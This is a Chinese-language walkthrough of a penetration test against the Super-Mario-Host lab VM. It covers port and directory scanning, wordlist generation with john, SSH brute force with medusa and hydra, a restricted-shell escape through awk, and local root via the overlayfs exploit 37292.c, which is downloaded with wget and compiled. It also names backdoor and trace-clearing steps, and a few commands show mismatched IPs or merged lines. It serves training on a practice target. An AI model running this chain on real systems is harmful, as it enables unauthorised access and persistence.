靶机渗透（八）Super-Mario-Host

靶机Super-Mario-Host

 

一、实验环境

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover)

3.端口扫描（masscan/nmap)

4.网站指纹信息扫描（whatweb)

（二）Web渗透

1.浏览web网页（8180端口）

2.目录扫描（dirb）

3.访问/vhosts

4.目录爆破（御剑）

5.访问/luigi.php

6.访问/mario.php

7.访问/command.php

8.生成字典（john）

9.暴力破解（medusa）

>暴力破解（hydra）

10.远程连接

11.权限突破（awk）

12.提权

13.留后门

14.清痕迹

---

一、实验环境

1.靶机：Super-Mario-Host

2.测试机：Kali

3.帮凶机：Windows 10

4.抓包工具：BurpSuite

二、实验步骤

（一）信息收集

1.查看测试机的IP信息，判断所处网段

2.主机发现（netdiscover)

netdiscover -i eth0 -r 192.168.10.0/24

3.端口扫描（masscan/nmap)

masscan --rate=10000 --ports 0-65535 192.168.10.154
nmap -sV -T4 -p 111,80,52448,22 192.168.10.151

• 开启了22（ssh服务）、8180（http服务）端口

4.网站指纹信息扫描（whatweb)

whatweb 192.168.10.154:8180

（二）Web渗透

1.浏览web网页（8180端口）

http://192.168.10.154:8180

• 网页与其源代码均无有用信息（这是个假网站！！！让我们去寻找真网站把！！！）

2.目录扫描（dirb）

dirb http://192.168.10.154:8180 /usr/share/dirb/wordlists/big.txt    #字典这种东西，有的能扫到，有的扫不到，换个就好了

• 将扫描出的路径逐个尝试，只有/vhosts返回值是200的目录（不管怎么扫都只有两个路径，我也很无奈啊？！）

3.访问/vhosts

a.尝试访问/vhosts

http://192.168.10.154:8180/vhosts

• 第一部分注释表明：收到请求后，虚拟主机首先检查hosts http请求标头中提交的值，然后使用它来选择要服务的目标来工作

• 获得一些敏感的节点信息：

靶机服务器名称（mario.supermariohost.local）

服务器的管理员（webmaster@localhost）

网站根路径（/var/www/supermariohost）

目录索引（mario.php）

• 若访问http://mario.supermariohost.local:8180，服务器将从/var/www/supermariohost目录中提供文件来服务mario.php

b.尝试访问服务器

http://mario.supermariohost.local:8180

• 访问失败，系统不识别服务器，应修改hosts文件

c.修改测试机的hosts文件

192.168.10.154 mario.supermariohost.local

• Windows中hosts文件：C:\Windows\System32\drivers\etc\hosts

• Linux中hosts文件：/etc/hosts

• Hosts文件作用：将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”，当用户在浏览器中输入一个需要登录的网址时，系统会首先自动从hosts文件中去寻找对应的IP地址，一旦找到，系统会立即打开对应网页，如果没有找到，系统则会再将网址提交DNS域名解析服务器进行IP地址解析

d.再次访问服务器（成功）

http://mario.supermariohost.local:8180

4.目录爆破（御剑）

http://mario.supermariohost.local:8180

5.访问/luigi.php

http://mario.supermariohost.local:8180/luigi.php

• 发现luigi的一封信，其内容可用于创造字典（Luigi、luigi、Luiiiggiii、luiiiggiii）list.txt

6.访问/mario.php

• 与网页首页相同，发现一段话，可用于创造字典（Mario、mario、Maaaaario）list.txt

7.访问/command.php

• 此页面可以对用户名进行搜索，看是否存在，对字典list.txt文件中的用户名挨个进行验证，仅有luigi用户名存在，使用john命令生成luigipass.txt字典

• 此时发现一个bug，查询用户名时抓包，发现这里所查询的用户名存在并不准确

8.生成字典（john）

john --wordlist=list.txt --stdout --rules > pass.txt

• John命令，可让字典在已有的字典上外加规则，修改基础词汇，扩充得到更丰富的字典（棒的哟~！）

9.暴力破解（medusa）

medusa -M ssh -t 4 -h 192.168.10.154 -U list.txt -P pass.txt    #美杜莎真的是难用到爆炸！！！

• 得到账号密码：luigi（luigi1）

>暴力破解（hydra）

hydra -l luigi -P luigipass.txt 192.168.10.154 ssh -t 20

• 此处luigipass.txt字典为只有用户名luigi使用John命令建立的扩充字典

10.远程连接

ssh [email protected]

• 终极三问命令无法使用，查看了一个message文件

• 用户luigi被困在一个有限的shell中，仅可使用awk，cat，cd，clear，echo，exit，help，history，ll，lpath，ls，lsudo，vim

11.权限突破（awk）

awk 'BEGIN {system("/bin/bash")}'

12.提权

a.扫描服务器版本（searchsploit）

searchsploit linux 3.13

• 该服务器版本存在本地权限提升漏洞（'overlayfs' Local Privilege Escalation），下载相关提权文件，进行提权

b.获取提权文件

cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html /etc/init.d/apache2 start
wget http://192.168.10.128/37292.c

c.执行提权文件，提权

gcc 37292.c -o exp
./exp 123

13.留后门

echo '' > index.php

14.清痕迹

 

---

总结：

1.开启http服务端口为8180端口，访问服务器时需加上端口号（默认为80端口）

2.可使用多种目录爆破工具进行爆破，以找到有用路径

3.对页面信息进行收集，学会筛选有用信息，做成字典以备用

4.用户账号若是被困在一个有限的shell中，使用awk命令是个好办法

5.对靶机服务器版本进行扫描，有可能获取版本漏洞，从而加以利用